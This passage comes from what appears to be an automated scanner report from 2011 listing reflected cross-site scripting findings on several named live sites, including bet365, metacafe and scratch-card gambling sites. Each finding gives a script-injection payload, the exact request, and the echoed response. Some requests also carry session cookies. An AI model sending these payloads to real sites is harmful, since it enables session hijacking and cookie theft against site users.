<a href="/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1e678c\"><script>alert(1)</script>c2083c9f32b" title="Home">
...[SNIP]...

3.62. https://www.aspireaffiliates.com/mobile/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /mobile/

Issue detail

The value of the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e4024</script><script>alert(1)</script>0074ed146f4 was submitted in the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mobile/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1e4024</script><script>alert(1)</script>0074ed146f4 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:46:45 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
ular").css("padding-top","630px");
       
       });
});

function RedirectToUrl(url){
//alert(url);
if (!url.indexOf('?')){url=url+'?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1e4024</script><script>alert(1)</script>0074ed146f4';}
window.location=url;

}
function goto(gourl){
window.location='/'+gourl+'/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1e4024</script>
...[SNIP]...

3.63. https://www.aspireaffiliates.com/mobile/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /mobile/

Issue detail

The value of the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94895"><script>alert(1)</script>833b2a295e9 was submitted in the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter. This input was echoed as 94895\"><script>alert(1)</script>833b2a295e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mobile/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=94895"><script>alert(1)</script>833b2a295e9 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:46:28 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<iframe src="https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=94895\"><script>alert(1)</script>833b2a295e9" frameborder="0" scrolling="no" height="96" width="950">
...[SNIP]...

3.64. https://www.aspireaffiliates.com/mobile/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /mobile/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab351"><script>alert(1)</script>85c0273528c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ab351\"><script>alert(1)</script>85c0273528c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mobile/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1&ab351"><script>alert(1)</script>85c0273528c=1 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:46:49 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<a href="/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1&ab351\"><script>alert(1)</script>85c0273528c=1" title="Home">
...[SNIP]...

3.65. https://www.aspireaffiliates.com/mobile/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /mobile/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2e4bc</script><script>alert(1)</script>34debe0dd4c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mobile/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1&2e4bc</script><script>alert(1)</script>34debe0dd4c=1 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:47:10 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
lar").css("padding-top","630px");
       
       });
});

function RedirectToUrl(url){
//alert(url);
if (!url.indexOf('?')){url=url+'?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1&2e4bc</script><script>alert(1)</script>34debe0dd4c=1';}
window.location=url;

}
function goto(gourl){
window.location='/'+gourl+'/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1&2e4bc</script>
...[SNIP]...

3.66. https://www.aspireaffiliates.com/mobile/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /mobile/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5944"><script>alert(1)</script>b657ab65e6b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c5944\"><script>alert(1)</script>b657ab65e6b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mobile/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1&c5944"><script>alert(1)</script>b657ab65e6b=1 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:46:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<iframe src="https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1&c5944\"><script>alert(1)</script>b657ab65e6b=1" frameborder="0" scrolling="no" height="96" width="950">
...[SNIP]...

3.67. http://www.bet365.com/home/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bet365.com
Path:   /home/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f18d6"><script>alert(1)</script>b33b92fe45 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /home/?f18d6"><script>alert(1)</script>b33b92fe45=1 HTTP/1.1
Host: www.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:30:51 GMT
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: no-store
Pragma: no-cache
Cache-Control: no-store
Content-Length: 45587
Content-Type: text/html
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 00:00:00 GMT; path=/
Cache-control: private


<!--version 1.0.0.1-->
<html>

<link rel="shortcut icon" href="http://www.bet365.com/favicons/bet365-favicon.ico" type="image/x-icon">
<head>
<META http-equiv="Content-Type" content="text/html;
...[SNIP]...
<iframe src="./mainpage.asp?rn=19232879864&f18d6"><script>alert(1)</script>b33b92fe45=1" scrolling="no" frameborder="0" marginwidth="0" marginheight="0" style="width:986px;height:1000px;" name="main" id="main">
...[SNIP]...

3.68. http://www.bet365.com/home/default.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bet365.com
Path:   /home/default.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 936ef"><script>alert(1)</script>c2361b79bb1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /home/default.asp?936ef"><script>alert(1)</script>c2361b79bb1=1 HTTP/1.1
Host: www.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:30:52 GMT
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: no-store
Pragma: no-cache
Cache-Control: no-store
Content-Length: 45588
Content-Type: text/html
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 00:00:00 GMT; path=/
Cache-control: private


<!--version 1.0.0.1-->
<html>

<link rel="shortcut icon" href="http://www.bet365.com/favicons/bet365-favicon.ico" type="image/x-icon">
<head>
<META http-equiv="Content-Type" content="text/html;
...[SNIP]...
<iframe src="./mainpage.asp?rn=19545540740&936ef"><script>alert(1)</script>c2361b79bb1=1" scrolling="no" frameborder="0" marginwidth="0" marginheight="0" style="width:986px;height:1000px;" name="main" id="main">
...[SNIP]...

3.69. http://www.metacafe.com/fplayer/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.metacafe.com
Path:   /fplayer/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4702d"><script>alert(1)</script>be96a23f3a3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fplayer/?4702d"><script>alert(1)</script>be96a23f3a3=1 HTTP/1.1
Host: www.metacafe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI CUR ADM OUR NOR STA NID"
Content-Type: text/html
Date: Mon, 16 May 2011 12:25:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=f78158bb406bb5151e43739ad7fa5f7b; path=/; domain=.metacafe.com
Set-Cookie: OAGEO=US%7CTX%7CDallas%7C75207%7C32.7825%7C-96.8207%7C623%7C214%7C%7C%7C; path=/; domain=.metacafe.com
Set-Cookie: OAID=c8335f487e2ebd40b47e9291ba6e9e32; expires=Tue, 15-May-2012 12:25:19 GMT; path=/; domain=.metacafe.com
Set-Cookie: User=%7B%22sc%22%3A1%2C%22visitID%22%3A%22bd5051062948efee2cb06d693c6e5416%22%2C%22LEID%22%3A40%2C%22LangID%22%3A%22en%22%2C%22npUserLocations%22%3A%5B244%5D%2C%22npUserLanguages%22%3A%5B9%5D%2C%22ffilter%22%3Atrue%2C%22pve%22%3A1%2C%22fbconnected%22%3Afalse%7D; expires=Sat, 14-May-2016 12:25:19 GMT; path=/; domain=.metacafe.com
Set-Cookie: dsavip=3400536236.20480.0000; expires=Mon, 16-May-2011 13:25:19 GMT; path=/
Content-Length: 73154

           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
           <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Metacafe - Online Video Entertainment - Free video clips for your enjoyment" href="/fplayer/rss.xml?4702d"><script>alert(1)</script>be96a23f3a3=1" />
...[SNIP]...

3.70. http://www.okscratchcards.com/ [70343%27-alert(1)-%2789d3bb43680 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.okscratchcards.com
Path:   /

Issue detail

The value of the 70343%27-alert(1)-%2789d3bb43680 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4dd46'-alert(1)-'c702a91d7ec was submitted in the 70343%27-alert(1)-%2789d3bb43680 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?70343%27-alert(1)-%2789d3bb43680=14dd46'-alert(1)-'c702a91d7ec HTTP/1.1
Host: www.okscratchcards.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/7
Cookie: __utma=80613129.1362500150.1305546536.1305546536.1305546536.1; __utmb=80613129.6.10.1305546536; __utmc=80613129; __utmz=80613129.1305546536.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; CSI_20=EncryptedUniqueVisitorID=2D7C0CC8562A483265BA53D772EFAEEE&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; UniqueVisitorID=2D7C0CC8562A483265BA53D772EFAEEE; LanguageCode=ENG; CountryCode=US; CSITemp=20

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 13008
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Mon, 16 May 2011 12:42:39 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
I_20");
window.open('https://secure.neogames-tech.com/ScratchCards/Lobby.aspx?CUR=GBP&CSI=20&LNG=~ENG&BD=home.okscratchcards.com&SDN=okscratchcards.com&CKI='+cookie_id+'&70343'-alert(1)-'89d3bb43680=14dd46'-alert(1)-'c702a91d7ec','','resizable=yes,left=0,top=0,width=' + (window.screen.width-8) + ',height=' + (window.screen.height - (window.screen.height>
...[SNIP]...

3.71. http://www.okscratchcards.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.okscratchcards.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c9e66'-alert(1)-'3904ab68a42 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?c9e66'-alert(1)-'3904ab68a42=1 HTTP/1.1
Host: www.okscratchcards.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 12560
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Mon, 16 May 2011 11:37:21 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
;
var cookie_id=getCookie("CSI_20");
window.open('https://secure.neogames-tech.com/ScratchCards/Lobby.aspx?CUR=GBP&CSI=20&LNG=~ENG&BD=home.okscratchcards.com&SDN=okscratchcards.com&CKI='+cookie_id+'&c9e66'-alert(1)-'3904ab68a42=1','','resizable=yes,left=0,top=0,width=' + (window.screen.width-8) + ',height=' + (window.screen.height - (window.screen.height>
...[SNIP]...

3.72. http://www.okscratchcards.com/terms-and-conditions.aspx [& parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.okscratchcards.com
Path:   /terms-and-conditions.aspx

Issue detail

The value of the & request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f7e02'-alert(1)-'f58d0b85f2e was submitted in the & parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /terms-and-conditions.aspx?&f7e02'-alert(1)-'f58d0b85f2e HTTP/1.1
Host: www.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 22824

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml"><head>


<title>
   
Online Scratch cards, featuring over 60 flash Scratch games and scratch off tickets &ndash; okscratc
...[SNIP]...

var cookie_id=getCookie("CSI_20");
window.open('https://secure.neogames-tech.com/ScratchCards/Lobby.aspx?CUR=GBP&CSI=20&LNG=~ENG&BD=home.okscratchcards.com&SDN=okscratchcards.com&CKI='+cookie_id+'&&f7e02'-alert(1)-'f58d0b85f2e','','resizable=yes,left=0,top=0,width=' + (window.screen.width-8) + ',height=' + (window.screen.height - (window.screen.height>
...[SNIP]...

3.73. http://www.okscratchcards.com/terms-and-conditions.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.okscratchcards.com
Path:   /terms-and-conditions.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c311e'-alert(1)-'d8afc8da06f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /terms-and-conditions.aspx?c311e'-alert(1)-'d8afc8da06f=1 HTTP/1.1
Host: www.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 22827

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml"><head>


<title>
   
Online Scratch cards, featuring over 60 flash Scratch games and scratch off tickets &ndash; okscratc
...[SNIP]...
;
var cookie_id=getCookie("CSI_20");
window.open('https://secure.neogames-tech.com/ScratchCards/Lobby.aspx?CUR=GBP&CSI=20&LNG=~ENG&BD=home.okscratchcards.com&SDN=okscratchcards.com&CKI='+cookie_id+'&c311e'-alert(1)-'d8afc8da06f=1','','resizable=yes,left=0,top=0,width=' + (window.screen.width-8) + ',height=' + (window.screen.height - (window.screen.height>
...[SNIP]...

3.74. http://www.primescratchcards.com/index.asp [curr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /index.asp

Issue detail

The value of the curr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 35af5'%3balert(1)//d13433ff10e was submitted in the curr parameter. This input was echoed as 35af5';alert(1)//d13433ff10e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index.asp?curr=USD35af5'%3balert(1)//d13433ff10e&g=3 HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:45 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 29900
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:44 GMT; domain=.primescratchcards.com; path=/
Set-Cookie: pscref=; expires=Thu, 10-May-2012 12:34:44 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }
   
   
   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=USD35af5';alert(1)//d13433ff10e&AR=130137&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no
...[SNIP]...

3.75. http://www.primescratchcards.com/index.asp [curr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /index.asp

Issue detail

The value of the curr request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13cad"%3balert(1)//2102d64af9 was submitted in the curr parameter. This input was echoed as 13cad";alert(1)//2102d64af9 in the application's response.

